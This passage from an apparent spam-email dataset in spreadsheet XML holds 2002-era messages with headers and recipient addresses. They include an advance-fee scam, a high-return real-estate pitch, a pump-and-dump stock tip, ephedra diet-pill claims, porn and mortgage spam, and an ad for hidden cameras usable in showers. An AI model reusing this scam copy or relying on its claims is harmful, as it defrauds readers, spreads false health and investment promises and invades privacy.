assured that this transaction is \nrisk-free. Also, your share for offering to assist us and provide the \nreceiving account will be 10% of the total sum, while 90% will be for my \ncolleagues and I, which also would be in your account for safe custody and \nprobable future investment purpose in your country.\n\nAs soon as we receive an acknowledgement of your willingness    to accept our \nproposal, we shall furnish you with further details as we concluded all \narrangements to have the money transferred to you within 7 working days from \nthe date of commencement.\n\nIf this proposal is acceptable to you, then furnish us with your most \nconfidential telephone and fax numbers  at which   time an application for the \nfund release will be forwarded in your favour.\n\nThank you in advance for your anticipated cooperation.\n\nRegards,\n\nAjibola James\n\nAlternative mail:jrade2000@caramail.com\n\n\n\n</t>
  </si>
  <si>
    <t>5479</t>
  </si>
  <si>
    <t>To: Brokers&lt;&gt;\nFrom: sancristobal@fastgroupsa.com\nDate: Wed, 24 Jul 2002 23:34:38 -0400</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 23:34:38 -0400</t>
  </si>
  <si>
    <t>sancristobal@fastgroupsa.com</t>
  </si>
  <si>
    <t>Brokers&lt;&gt;</t>
  </si>
  <si>
    <t>RE: International Real Estate - Huge Commissions</t>
  </si>
  <si>
    <t>![]([URL]http://www.sancristobalsa.net[/URL]  \n---  \n  \n| ![]([URL]http://www.sancristobalsa.net[/URL]  \n---  \n![]([URL]http://www.sancristobalsa.net[/URL]  \n  \n\n**Tremendous Investment Opportunity!**\n\nAre you are fed up with the manipulation and erratic performance of the stock\nmarket?  Like most people, are you looking for a stable investment that can\nprovide a **25%-35% tax-free annual cash flow return?   If you answered yes to\neither question, I have an exciting offering for you.**\n\nI represent a company that has a limited offering of emerging growth Caribbean\nReal Estate that enjoins a tropical working farm, which provides **substantial\ncash flow, long-term wealth accumulation** , and the proven **appreciation of\nCaribbean real estate.**\n\nHere are the details:\n\n|  |\n\n![]([URL]http://www.sancristobalsa.net[/URL]  A 20-acre tract\nof waterfront Caribbean real estate is only $106,000 (including closing costs\nand dual residency status in a tax-advantaged country).\n\n![]([URL]http://www.sancristobalsa.net[/URL]  The investment\nwill be totally private and protected from lawsuits.\n\n![]([URL]http://www.sancristobalsa.net[/URL]  The plantation\nhas a proven track record.\n\n![]([URL]http://www.sancristobalsa.net[/URL]  Total turnkey\nsystem is provided - You buy the real estate. The Management Company plants,\nmaintains, and harvests your crop.  You deposit the quarterly cash returns.\n\n  \n---  \n  \n\nWe currently have several tracts of Phase II remaining and it is premier\nproperty that is planned to overlook the natural marina of an eco resort.\nThere is incredible demand for these tracts and I wanted to give you the first\nopportunity to participate in this exciting and lucrative project.\n\nPlease review the online PowerPoint presentation and I can put you in touch\nwith the principals of the project to answer any questions that you have.\n\nClick Here to View Presentation\n\nPlease contact me, as soon as possible, so you don't miss out on this\noffering.\n\nSincerely yours,![]([URL]http://www.sancristobalsa.net[/URL]\n\nCorporate  \nReal Property Magazine  \nMaster Broker  \nSan Cristobal Land Development  \n[URL]http://www.sancristobalsa.net[/URL]\n\n**PS.   If Huge Returns, Rapid Cash Flow, and the Security of Titled Real\nEstate interest you, contact me, today!**\n\nTelephone: 011-507 226-2675  \nFax: 011-507 226-5884  \nE-mail: tom@realpropertymagazine.com\n\n  \nPlease fill in the form below to request more information:  \n  \n| ![](images/upl_corn.gif)| | ![](images/upr_corn.gif)  \n---|---|---  \n|  |  \n**Name:  ** |  \n  \n---|---  \n**Phone:  ** |  \n**E-mail:  ** |  \n  \n  \n  \n![](images/dwl_corn.gif)| | ![](images/dwr_corn.gif)  \n  \n  \n  \n\n\n  \n  \nTo be removed reply with "remove" in the subject line. Thank you!\n\--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http://www.sancristobalsa.net http://www.sancristobalsa.net http://www.sancristobalsa.net http://www.sancristobalsa.net http://www.sancristobalsa.net http://www.sancristobalsa.net http://www.sancristobalsa.net http://www.sancristobalsa.net http://www.sancristobalsa.net http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5480</t>
  </si>
  <si>
    <t>To: nan\nFrom: spyware@infonet.com\nDate: Wed, 24 Jul 2002 22:54:54 -0500</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 22:54:54 -0500</t>
  </si>
  <si>
    <t>spyware@infonet.com</t>
  </si>
  <si>
    <t>Watch your TEENS or the BabySitter....&amp; GET RICH!</t>
  </si>
  <si>
    <t>Look this is so hot that not only do you want one... but you can get rich selling it to others... some will use it for good and many will use it for bad... either way the unit works...It is a bulb... but it is not a bulb... it is a secret wireless camera use professionally by cia, fbi and others... original cost was over $5000 but because someone went to china to knock them off you now can buy it today for $299 each, or 2 for $499 or 10 for $1750... do the math... you can earn $125 per unit or more and sell 10 in a week... all people need to do is see one and they flip out...Here is how it worksYou screw it into any lamp, wall  or ceiling bulb socet (even over the shower) it could be in a dark place it don't matter... put it in your bedroom and make sure your wife does not have company while you are working... i am telling you man you would pay $1000's for this toy... Then you take the other piece and plug it into your vcr and it is as if you were standing over the person wi!\nth!\n a video camera... As I said some will use it for good and some will use it for bad... and some will be like me and just get rich selling them... all you need do is demo it and they buy it... heh he even if it takes a day to sell just one you make $125but who says you have to charge $299 you can charge $499 and make $325 follow the rest of the information and check it out....Special Sale thru July 31st, 2002               [URL]http://www.easy-signup.com[/URL] \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nWhy am I receiving this email?  Because you or someone using this email address has opted to receive New Product information from Internet-Hitz or one of its entrusted partners..Thank you for your patronage.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nIf this is an error please send an email to be removed.\nin the subject line type: Remove Me List-1046-78x\nmail to meoffnow2Kb@yahoo.com\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http://www.easy-signup.com http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5501</t>
  </si>
  <si>
    <t>To: &lt;ellendew@aol.com&gt;\nFrom: "Alexandria" &lt;ni9jurp7f9684@hotmail.com&gt;\nDate: Wed, 24 Jul 2002 22:40:27 -1900</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 22:40:27 -1900</t>
  </si>
  <si>
    <t>"Alexandria" &lt;ni9jurp7f9684@hotmail.com&gt;</t>
  </si>
  <si>
    <t>&lt;ellendew@aol.com&gt;</t>
  </si>
  <si>
    <t>Toners and inkjet cartridges for less....          JRTX</t>
  </si>
  <si>
    <t>Tremendous Savings on Toners,  Inkjets, FAX, and Thermal Replenishables!! Toners 2 Go is your secret weapon to lowering your cost for High Quality, Low-Cost printer supplies!  We have been in the printer replenishables business since 1992, and pride ourselves on rapid response and outstanding customer service.  What we sell are 100% compatible replacements for Epson, Canon, Hewlett Packard, Xerox, Okidata, Brother, and Lexmark; products that meet and often exceed original manufacturer's specifications. Check out these prices!         Epson Stylus Color inkjet cartridge (SO20108):     Epson's Price: $27.99     Toners2Go price: $9.95!        HP LaserJet 4 Toner Cartridge (92298A):           = ; HP's Price: $88.99            Toners2Go   price: $41.75!   Come visit us on the web to check out our hundreds of similar bargains at Toners 2 Go!      request to be removed by clicking HERE sarki [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>5471</t>
  </si>
  <si>
    <t>To: bjhacha@hotmail.com, crtyler1@msn.com, tbradshaw@texnet.net,\nFrom: jabba5346192@yahoo.com\nDate: Wed, 24 Jul 2002 21:41:25 -0400</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 21:41:25 -0400</t>
  </si>
  <si>
    <t>jabba5346192@yahoo.com</t>
  </si>
  <si>
    <t>bjhacha@hotmail.com, crtyler1@msn.com, tbradshaw@texnet.net,</t>
  </si>
  <si>
    <t>100% FREE HARDCORE MEGASITE!!</t>
  </si>
  <si>
    <t>\n\n100% Free Porn!  \nWhat more can you ask for?\n\n**CLICK HERE**\n\n\n\n\n\n\n\nREMOVAL INSTRUCTIONS: We strive to never send unsolicited mail.  \nHowever, if you'd rather not receive future e-mails from us,  \nCLICK HERE to send email and add the word REMOVE in the subject line.  \nPlease allow 48 hours for processing.\n\n[(^(PO1:KJ)_8J7BJK9^":}H&amp;*TG0BK5NKIYs5] \--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473</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: fork@spamassassin.taint.org\nDate: Wed, 24 Jul 2002 21:11:54 -0500</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 21:11:54 -0500</t>
  </si>
  <si>
    <t>You're Paying Too Much</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_480_83855460462270663 Content-Type: text/plain; 	charset=iso-8859-1 Content-Transfer-Encoding: Quoted-Printable We will help you get the mortgage loan you want!  Only takes 2 minutes to fill out our form.  [URL]http://xnet.123alias.com[/URL] Whether a new home loan is what you seek or to refinance your current home = loan at a lower interest rate and payment, we can help! Mortgage rates haven't been this low in the last 12 months, take action now! Refinance your home with us and include all of those pesky credit card bills = or use the extra cash for that pool you've always wanted...  Where others says NO, we say YES!!! Even if you have been turned down elsewhere, we can help!  Easy terms! Our mortgage referral service combines the highest quality loans with most economical rates and the easiest = qualification! Click Here to fill out our form.  [URL]http://xnet.123alias.com[/URL]   ------=_NextPart_480_83855460462270663 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: Quoted-Printable Mortgage companies make you wait Mortgage companies make you wait...They Demand to Interview you..= They Intimidate you...They Humiliate you...And All of That is = While They Decide If They Even Want to Do Business With You...= We Turn the Tables = on Them...Now, You're In Charge Just Fill Out Our Simple = Form and They Will Have to Compete For Your Business...CLICK HERE FOR THE = FORM We have hundreds of loan programs, including: Purchase Loans               Refinance               Debt Consolidation               Home Improvement               Second Mortgages               No Income Verification              You can save Thousands = Of Dollars over the course of your loan with just a 1/4 of 1% Drop = in your rate! CLICK HERE FOR = THE FORM You = will often be contacted with an offer thevery same day you fill out the = form! This email was sent to you via Saf-E Mail Systems.  Your email address was automatically inserted into the To and From addresses to eliminate undeliverables which waste bandwidth and cause internet congestion. Your email or webserver IS NOT being used for the sending of this mail. No-one else is receiving emails from your address. You may utilize the removal link below if you do not wish to receive this mailing.    Please Remove = Me   Saf-E = Mail Systems, PO Box 116-3015 San Rafael de Heredia, = CR ------=_NextPart_480_83855460462270663-- [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://xnet.123alias.com http://xnet.123alias.com http://xent.com</t>
  </si>
  <si>
    <t>5470</t>
  </si>
  <si>
    <t>To: "Inbox" &lt;8689@qwest.net&gt;\nFrom: "Wanda Dallas" &lt;williamblockeriis@kingmax.com.tw&gt;\nDate: Wed, 24 Jul 2002 20:22:51 -0500 (added by postmaster@emailcluster.terra.com.mx)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 20:22:51 -0500 (added by postmaster@emailcluster.terra.com.mx)</t>
  </si>
  <si>
    <t>"Wanda Dallas" &lt;williamblockeriis@kingmax.com.tw&gt;</t>
  </si>
  <si>
    <t>"Inbox" &lt;8689@qwest.net&gt;</t>
  </si>
  <si>
    <t>TRADING INFORMATION</t>
  </si>
  <si>
    <t>=                                                                               Fo= r                                         Immediate Release Cal-Bay (Stock Symbol: CBYI)        Watch for analyst =22Strong Buy Recommendations=22 and sev= eral advisory newsletters        picking CBYI.   CBYI has filed to be traded on the = ;OTCBB,        share prices historically INCREASE when companies get listed        on this larger trading exhange. CBYI is trading around 25 ce= nts        and should skyrocket to =242.66 - =243.25 a share in the near futur= e.          Put CBYI on your watch list, acquire a postion TODAY.               =                                                      REASONS TO INVEST IN CBYI                                     A profitable company and is on = track to beat ALL        earnings estimates                                                                     =21 One of the FASTEST growing distrib= utors in environmental &amp; safety        equipment instruments.                                                             =                                       Excellent management team= , several EXCLUSIVE        contracts.  IMPRESSIVE client list including the U.S. A= ir Force,        Anheuser-Busch, Chevron Refining and Mitsubishi Heavy Industries,=         GE-Energy &amp; Environmental Research. RAPID= LY GROWING INDUSTRY Industry revenues exceed =24900 mil= lion, estimates indicate that there        could be as much as =2425 billion from =22smell technology=22 by the=  end of        2003. =21=21=21= =21=21 CONGRATULATIONS        =21=21=21=21=21Our last recommendation to buy ORBT a= t        =241.29 rallied and is holding steady at =244.51=21&amp;n= bsp;        Congratulations to all our subscribers that took advantage of thi= s        recommendation.      =                                                              ALL removes HONER= ED. Please allow 7        days to be removed and send ALL address to: NoMore=40btamail.net.cn     Certain statements contained in this news release m= ay be  forward-looking statements within the meaning of The Private Securities=   Litigation Reform Act of 1995. These statements may be identified by su= ch terms  as =22expect=22, =22believe=22, =22may=22, =22will=22, and =22intend=22 or simila= r terms. We are NOT  a registered investment advisor or a broker dealer. This is NOT an offe= r to buy  or sell securities. No recommendation that the securities of the compan= ies  profiled should be purchased, sold or held by individuals or entities t= hat learn  of the profiled companies. We were paid =2427,000 in cash by a third par= ty to  publish this report. Investing in companies profiled is high-risk and u= se of  this information is for reading purposes only. If anyone decides to act=  as an  investor, then it will be that investor's sole risk. Investors are advi= sed NOT  to invest without the proper advisement from an attorney or a registere= d  financial broker. Do not rely solely on the information presented, do a= dditional  independent research to form your own opinion and decision regarding in= vesting  in the profiled companies. Be advised that the purchase of such high-ri= sk  securities may result in the loss of your entire investment.    =          The owners of this publication may already own free trading sha= res in  CBYI and may immediately sell all or a portion of these shares into the=  open  market at or about the time this report is published.  Factual sta= tements  are made as of the date stated and are subject to change without notice= .   Not intended for recipients or residents of CA,CO,CT,DE,ID,             IL,IA,LA,MO,NV,NC,OK,OH,PA,RI,TN,VA,WA,WV,WI. Void where  prohibited.  Copyright c 2001 **********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460</t>
  </si>
  <si>
    <t>To: cypherpunks@einstein.ssz.com\nFrom: "Special Deals" &lt;unsubs-545c301b6d-cypherpunks=einstein.ssz.com@b.verticalresponse.com&gt;\nDate: Wed, 24 Jul 2002 20:21:53 +0000</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 20:21:53 +0000</t>
  </si>
  <si>
    <t>"Special Deals" &lt;unsubs-545c301b6d-cypherpunks=einstein.ssz.com@b.verticalresponse.com&gt;</t>
  </si>
  <si>
    <t>cypherpunks@einstein.ssz.com</t>
  </si>
  <si>
    <t>Free MP3 Player - Listen To Great Books!</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. --__________MIMEboundary__________ Content-Type: text/plain Content-Transfer-Encoding: quoted-printable X-MIME-Autoconverted: from 8bit to quoted-printable by hq.pro-ns.net id g6PDXti4039145 DOWNLOAD THE SUMMONS NOW =96 LISTEN TO IT ON YOUR FREE MP3 PLAYER! John Grisham is back doing what he does best =96 delivering the top legal thrillers of his generation.  The Summons is Grisham=92s first suspense novel in two years and now you can listen to it on your FREE MP3 player- only from Audible. Audible is the source for great audio entertainment and information.  Now you can forget about those expensive and clumsy audiobooks on cassette an= d CD.  Audible is digital so you can listen on any computer or AudibleReady= =99 Pocket PC or MP3 player.  Listen on your commute or at the gym or anywher= e you want to get away from it all. SPECIAL OFFER=20 Join one of our great, money-saving membership plans now and we will send you a free OTIS=99 MP3 player (a $119 value)!  Designed and manufactured = to our specifications, Audible=92s own OTIS is the best way to listen to Audible content.  Compact and stylish, the OTIS is sturdy, lightweight an= d smaller than the average cell phone. The OTIS: =95 Holds up to 64 MB of memory =95 Plays up to 17 hours of Audible content, plus Windows Media and MP3 files =95 Used USB connectivity for fast audio transfer =95 Comes with FREE ear buds, carrying case and cassette adapter Enjoy The Summons by John Grisham or choose from over 20,000 other selections =96 bestsellers like Everything=92s Eventual by Stephen King, = Beach House by James Patterson or Up Country by Nelson DeMille, as well as dail= y versions of The Wall Street Journal and The New York Times or other subscriptions. To get your free MP3 player, CLICK HERE. [URL]www.audible.com[/URL] Note: Offer expires 8/31/02, while supplies last. You may have received this in error if you currently have more than one active Audible account. Audible reserves the right to cancel, change or substitute this offer at any time. Void where prohibited by law and subject to all federal, state and local laws and regulations. Some titles are not available in all countries.=20 =A9 Copyright 2002 Audible, Inc., All Rights Reserved =20 ______________________________________________________________________ You are receiving this email because you requested to receive info and updates via email. To unsubscribe, reply to this email with "unsubscribe" in the subject or simply click on the following link: [URL]http://unsubscribe.verticalresponse.com[/URL] --__________MIMEboundary__________ Content-Type: text/html Content-Transfer-Encoding: quoted-printable X-MIME-Autoconverted: from 8bit to quoted-printable by hq.pro-ns.net id g6PDXti4039145   Audible.com       =        =     =   =20      John Grisham is back doing what he does be= st - delivering the top legal thrillers of his generation. The Summons is Grisham's first suspense novel in two years. And now you can listen to it on your FREE MP3 player!           =20 =         =     =20 Designed and manufactured to our specifications, Audible=92s own Otis™ mobile audio player is the best way to listen to Audible. Compact and stylish, the Otis is sturdy, lightweight, and smaller than th= e average cell phone.  64 MB of memory     =20 Plays up to 17 hours of Audible content formats 2 and 3    plus Windows Media and MP3 files USB connectivity for fast audi= o transfer Comes with ear buds, carrying case, and cassette adapter     =20       Audible is the source for great audio entertainment and information. Now you can forget about those expensive and clumsy audiobooks on cassette and CD. Audible is digital so you can listen on any computer or AudibleReady™ Pocket PC or MP3 player. Listen on your commute or at the gym or anywhere you want to get away from it all.   =20      =20         = =20                 =        = =20                Note: Offer expires 8/31/02. While supplies last. = You may have received this in error if you currently have more than one activ= e Audible account. Audible reserves the right to cancel, change or substitute this offer at any time. Void where prohibited by law and subject to all federal, state and local laws and regulations. Some titles are not available in all countries. © Copyright 2002 Audible, Inc., All Rights Reserved.    =20 You = are receiving this email because you requested to receive info and updates vi= a email. To unsubscribe, reply to this email with "unsubscribe" in the subject or simply click on the following link: Unsubscribe --__________MIMEboundary__________-- .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www.audible.com http://unsubscribe.verticalresponse.com http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5457</t>
  </si>
  <si>
    <t>To: &lt;cpunks@minder.net&gt;\nFrom: "AMY" &lt;netexcelerator@yahoo.com&gt;\nDate: Wed, 24 Jul 2002 20:03:30</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 20:03:30</t>
  </si>
  <si>
    <t>"AMY" &lt;netexcelerator@yahoo.com&gt;</t>
  </si>
  <si>
    <t>&lt;cpunks@minder.net&gt;</t>
  </si>
  <si>
    <t>none</t>
  </si>
  <si>
    <t>Hello,\n\nThis is a one time mailing. \n\nWe are looking for people who might be interested in\nworking P/T from home.  This position involves working\n10-15 hours per week.   You can expect to make $15-$25\nper hour worked.  To see a job description, you may go to\n\n[URL]http://begintodaystarttomorrow.S5.com.com[/URL]\n\nHave a great day!\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http://begintodaystarttomorrow.S5.com.com http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5494</t>
  </si>
  <si>
    <t>To: &lt;peeru@hotmail.com&gt;, &lt;abehli@msn.com&gt;, &lt;airdish@hotmail.com&gt;\nFrom: d_tah@hotmail.com\nDate: Wed, 24 Jul 2002 19:47:46 -1600</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 19:47:46 -1600</t>
  </si>
  <si>
    <t>d_tah@hotmail.com</t>
  </si>
  <si>
    <t>&lt;peeru@hotmail.com&gt;, &lt;abehli@msn.com&gt;, &lt;airdish@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Lose 21 Pounds In 10 Days                25654</t>
  </si>
  <si>
    <t>Long time no chat!\n\nHow have you been? If you've been like me, you've been trying\ntrying almost EVERYTHING to lose weight. I know how you feel\n- the special diets, miracle pills, and fancy exercise \nequipment never helped me lose the pounds I needed to lose\neither. It seemed like the harder I worked at it, the less\nweight I lost - until I heard about 'Extreme Power Plus'.\n\nYou're probably thinking to yourself, "Oh geez, not another\nmiracle diet pill!" Like you, I was skeptical at first, but \nmy sister said it helped her lose 23 pounds in just 2 weeks, \nso I told her I'd give it a try. I mean, there was nothing \nto lose except a lot of weight! Let me tell you, it was\nthe best decision I've ever made.  PERIOD.  Six months later,\nas I'm writing this message to you, I've gone from 355 pounds\nto 210 pounds, and I haven't changed my exercise routine or diet\nat all. Yes, I still eat pizza, and lots of it!\n\nI was so happy with the results that I contacted the manufacturer\nand received permission to resell it - at a HUGE discount.I feel\nthe need to help other people lose weight like I did, because it\ndoes so much for your self-esteem, not to mention your health.\nI am giving you my personal pledge that 'Extreme Power Plus'\nabsolutely WILL WORK FOR YOU. 100 % Money-Back GUARANTEED!\n\nIf you are frustrated with trying other products, without having \nany success, and just not getting the results you were promised,\nthen I recommend the only product that worked for me - \n'EXTREME POWER PLUS'!\n\nYou're probably asking yourself, "Ok, so how does this stuff\nactually work?"\n\nExtreme Power Plus contains Lipotropic fat burners and ephedra which \nis scientifically proven to increase metabolism and cause rapid \nweight loss. No "hocus pocus" in these pills - just RESULTS!!! \n\nHere is the bottom line ...\n\nI can help you lose 10-15 pounds per week naturally, without\nexercising and without having to eat rice cakes all day. \nJust try it for one month - there's pounds to lose and confidence \nto gain! You will lose weight fast - GUARANTEED. This is my\npledge to you.\n\nBONUS! Order NOW &amp; get FREE SHIPPING on 3 bottles or more! \n\nTo order Extreme Power Plus on our secure server, just click\non this link -&gt; [URL]http://www.2002dietspecials.com[/URL]\n\nTo see what some of our customers have said about this product, \nvisit [URL]http://www.2002dietspecials.com[/URL]\n\nTo see a list of ingredients and for more information\non test studies and how it will help you lose weight, visit \n[URL]http://www.2002dietspecials.com[/URL]\n\n**************************************************************\nIf you feel that you have received this email in error, please \nsend an email to "print2@btamail.net.cn" requesting to be \nremoved. Thank you, and we apologize for any inconvenience.\n**************************************************************</t>
  </si>
  <si>
    <t>http://www.2002dietspecials.com http://www.2002dietspecials.com http://www.2002dietspecials.com</t>
  </si>
  <si>
    <t>5455</t>
  </si>
  <si>
    <t>To: cpunks@einstein.ssz.com\nFrom: &lt;gtts@cable.net.co&gt;\nDate: Wed, 24 Jul 2002 19:26:50</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 19:26:50</t>
  </si>
  <si>
    <t>&lt;gtts@cable.net.co&gt;</t>
  </si>
  <si>
    <t>cpunks@einstein.ssz.com</t>
  </si>
  <si>
    <t>Save up to 50% on laser printer, copier, and fax cartridges.</t>
  </si>
  <si>
    <t>\n\n**GT TONER SUPPLIES  \nLaser printer and computer supplies  \n1-866-237-7397**\n\n![]([URL]http://images.google.com[/URL]\n![]([URL]http://images.google.com[/URL]\nfill.co.uk/groopprinter.gif)\n\n**_Save up to 40% from retail price on laser printer toner cartridges,  \ncopier and fax cartridges._ **\n\n**_CHECK OUT OUR GREAT PRICES!_ **\n\n**_If you received this email on error, please reply to gtts1@cable.net.co\nwith subject: REMOVE... sorry for the inconvenience.\n\n ** _Please forward to the person responsible for purchasing your laser\nprinter supplies._\n\n    Order by phone: (toll free) 1-866-237-7397    \n\n    Order by email:  Simply reply this message or click here  with subject:  ORDER\n\n   ** ** Email removal: Simply reply this message or  click here   with\nsubject:  REMOVE  \n  \nUniversity and/or  School purchase orders WELCOME. (no credit approval\nrequired)  \nPay by check, c.o.d, or purchase order (net 30 days).  **\n\n**_WE ACCEPT ALL MAJOR CREDIT CARDS!_**\n\n**New! HP 4500/4550 series color cartridges in stock!**\n\n**_Our cartridge prices are as follows:  \n(please order by item number)_ **\n\n**Item                 Hewlett Packard                   Price**\n\n`**1 -- 92274A Toner Cartridge for LaserJet 4L, 4ML, 4P, 4MP\n------------------------$47.50  \n2 -- C4092A Black Toner Cartridge for LaserJet 1100A, ASE,\n3200SE-----------------$45.50  \n2A - C7115A Toner Cartridge For HP LaserJet 1000, 1200, 3330\n---------------------$55.50  \n2B - C7115X High Capacity Toner Cartridge for HP LaserJet 1000, 1200, 3330\n-------$65.50  \n3 -- 92295A Toner Cartridge for LaserJet II, IID, III, IIID\n----------------------$49.50  \n4 -- 92275A Toner Cartridge for LaserJet IIP, IIP+, IIIP\n-------------------------$55.50  \n5 -- C3903A Toner Cartridge for LaserJet 5P, 5MP, 6P, 6Pse, 6MP, 6Pxi\n------------$46.50  \n6 -- C3909A Toner Cartridge for LaserJet 5Si, 5SiMX, 5Si Copier, 8000\n------------$92.50  \n7 -- C4096A Toner Cartridge for LaserJet 2100, 2200DSE, 2200DTN\n------------------$72.50  \n8 - C4182X UltraPrecise High Capacity Toner Cartridge for LaserJet 8100\nSeries---$125.50  \n9 -- C3906A Toner Cartridge for LaserJet 5L, 5L Xtra, 6Lse, 6L, 6Lxi,\n3100se------$42.50  \n9A - C3906A Toner Cartridge for LaserJet 3100, 3150\n------------------------------$42.50  \n10 - C3900A Black Toner Cartridge for HP LaserJet 4MV, 4V\n------------------------$89.50  \n11 - C4127A Black Toner Cartridge for LaserJet 4000SE, 4000N, 4000T, 4000TN\n------$76.50  \n11A- C8061A Black Laser Toner for HP LaserJet 4100, 4100N\n------------------------$76.50  \n11B- C8061X High Capacity Toner Cartridge for LJ4100, 4100N\n----------------------$85.50  \n11C- C4127X High Capacity Black Cartridge for LaserJet\n4000SE,4000N,4000T,4000TN -$84.50  \n12 - 92291A Toner Cartridge for LaserJet IIISi, 4Si, 4SiMX\n-----------------------$65.50  \n13 - 92298A Toner Cartridge for LaserJet 4, 4 Plus, 4M, 4M Plus, 5, 5se, 5M,\n5N --$46.50  \n14 - C4129X High Capacity Black Toner Cartridge for LaserJet 5000N\n---------------$97.50  \n15 - LASERFAX 500, 700 (FX1)\n-----------------------------------------------------$49.00  \n16 - LASERFAX 5000, 7000 (FX2)\n---------------------------------------------------$54.00  \n17 - LASERFAX (FX3)\n--------------------------------------------------------------$49.00**  \n**18 - LASERFAX (FX4)\n--------------------------------------------------------------$49.00**`\n\n**Item             Hewlett Packard - Color                   Price**\n\n`**C1 -- C4194a Toner Cartridge, Yellow (color lj 4500/4550\nseries)------------------ $ 89.50  \nC2 -- C4193a Toner Cartridge, Magenta (color lj 4500/4550\nseries)----------------- $ 89.50  \nC3 -- C4192a toner cartridge, cyan (color lj 4500/4550\nseries)-------------------- $ 89.50  \nC4 -- c4191a toner cartridge, black (color lj 4500/4550\nseries)------------------- $ 74.50**`\n\n**Item                     Lexmark                         Price**\n\n`**19 - 1380520 High Yield Black Laser Toner for 4019, 4019E, 4028, 4029, 6,\n10, 10L -- $109.50  \n20 - 1382150 High Yield Toner for 3112, 3116, 4039-10+, 4049- Model 12L,16R,\nOptra - $109.50  \n21 - 69G8256 Laser Cartridge for Optra E, E+, EP, ES, 4026, 4026 (6A,6B,6D,6E)\n---- $ 49.00  \n22 - 13T0101 High Yield Toner Cartridge for Lexmark Optra E310, E312, E312L\n-------- $ 89.00  \n23 - 1382625 High-Yield Laser Toner Cartridge for Lexmark Optra S (4059)\n----------- $129.50  \n24 - 12A5745 High Yield Laser Toner for Lexmark Optra T610, 612, 614 (4069)\n-------- $165.00**`\n\n**Item                 Epson                     Price**\n\n`**25 ---- S051009 Toner Cartridge for Epson EPL7000, 7500, 8000+ - $115.50  \n25A --- S051009 LP-3000 PS 7000 -------------------------------- $115.50  \n26 ---- AS051011 Imaging Cartridge for ActionLaser-1000, 1500 -- $ 99.50  \n26A --- AS051011 EPL-5000, EPL-5100, EPL-5200 ------------------ $ 99.50  \n** `\n\n**Item             Panasonic                Price**\n\n`**27 ------Nec series 2 models 90 and 95 ---------------------- $109.50  \n**`\n\n**Item                      Apple                                Price**\n\n`**28 ---- 2473G/A Laser Toner for LaserWriter Pro 600, 630, LaserWriter\n16/600 PS - $ 57.50  \n29 ---- 1960G/A Laser Toner for Apple LaserWriter Select, 300, 310, 360\n--------- $ 71.50  \n30 ---- M0089LL/A Toner Cartridge for Laserwriter 300, 320 (74A)\n---------------- $ 52.50  \n31 ---- M6002 Toner Cartridge for Laserwriter IINT, IINTX, IISC, IIF, IIG\n(95A) - $ 47.50  \n31A --- M0089LL/A Toner Cartridge for Laserwriter LS, NT, NTR, SC (75A)\n--------- $ 55.50  \n32 ---- M4683G/A Laser Toner for LaserWriter 12, 640PS\n-------------------------- $ 85.50  \n** `\n\n**Item                 Canon                           Price**\n\n`**33 --- Fax CFX-L3500, CFX-4000 CFX-L4500, CFX-L4500IE &amp; IF FX3 -----------\n$ 49.50  \n33A -- L-250, L-260i, L-300 FX3 ------------------------------------------ $\n49.50  \n33B -- LASER CLASS 2060, 2060P, 4000 FX3 --------------------------------- $\n49.50  \n34 --- LASER CLASS 5000, 5500, 7000, 7100, 7500, 6000 FX2 ---------------- $\n49.50  \n35 --- FAX 5000 FX2 ------------------------------------------------------ $\n49.50  \n36 --- LASER CLASS 8500, 9000, 9000L, 9000MS, 9500, 9500 MS, 9500 S FX4 -- $\n49.50  \n36A -- Fax L700,720,760,770,775,777,780,785,790, &amp; L3300 FX1 ------------- $\n49.50  \n36B -- L-800, L-900 FX4 -------------------------------------------------- $\n49.50  \n37 --- A30R Toner Cartridge for PC-6, 6RE, 7, 11, 12 --------------------- $\n59.50  \n38 --- E-40 Toner Cartridge for PC-720, 740, 770, 790,795, 920, 950, 980 - $\n85.50  \n38A -- E-20 Toner Cartridge for PC-310, 325, 330, 330L, 400, 420, 430 ---- $\n85.50**  \n`\n\n**Item    Xerox    